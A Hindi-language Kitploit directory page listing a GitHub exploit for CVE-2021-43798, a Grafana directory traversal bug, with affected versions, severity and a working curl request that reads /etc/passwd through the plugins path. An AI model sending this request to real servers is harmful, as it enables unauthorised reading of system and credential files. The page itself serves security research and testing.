Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-43798 — Grafana डायरेक्ट्री ट्रैवर्सल (CVE-2021-43798) के लिए एक्सप्लॉइट, जो क्राफ्टेड HTTP अनुरोधों के माध्यम से अनधिकृत फ़ाइल पढ़ने की अनुमति देता है। | Kitploit
उपकरण/GitHubGitHub/shoxake17/cve-2021-43798
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubshoxake17/cve-2021-43798

CVE-2021-43798

Grafana डायरेक्ट्री ट्रैवर्सल (CVE-2021-43798) के लिए एक्सप्लॉइट, जो क्राफ्टेड HTTP अनुरोधों के माध्यम से अनधिकृत फ़ाइल पढ़ने की अनुमति देता है।

रिपॉजिटरी देखें
25 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-43798 by Privacy Hunter

प्रभावित संस्करण: Grafana 8.0.0-beta1 से 8.3.0 तक (पैच किए गए संस्करणों को छोड़कर)

कमजोरी का प्रकार: Directory Traversal (निर्देशिका में भ्रमण)

प्रभाव स्तर: अत्यंत खतरनाक (Critical)

प्लेटफ़ॉर्म: Grafana (ओपन-सोर्स मॉनिटरिंग और ऑब्ज़र्वेबिलिटी प्लेटफ़ॉर्म)

⚠️ कमजोरी का विवरण Grafana में निम्नलिखित URL के माध्यम से निर्देशिका ट्रैवर्सल किया जा सकता है:

Code http://<grafana_host>/public/plugins// इसके द्वारा हमलावर सर्वर पर स्थानीय फ़ाइलों को पढ़ सकता है। उदाहरण के लिए, /etc/passwd या कॉन्फ़िगरेशन फ़ाइलों तक अनधिकृत पहुँच।

🔥 शोषण उदाहरण एक साधारण अनुरोध के माध्यम से फ़ाइल पढ़ना:

bash curl http://target:3000/public/plugins/alertlist/../../../../../../../../etc/passwd उपरोक्त अनुरोध के माध्यम से Linux सिस्टम पर उपयोगकर्ताओं की सूची प्राप्त की जा सकती है।

टूल डाउनलोड करें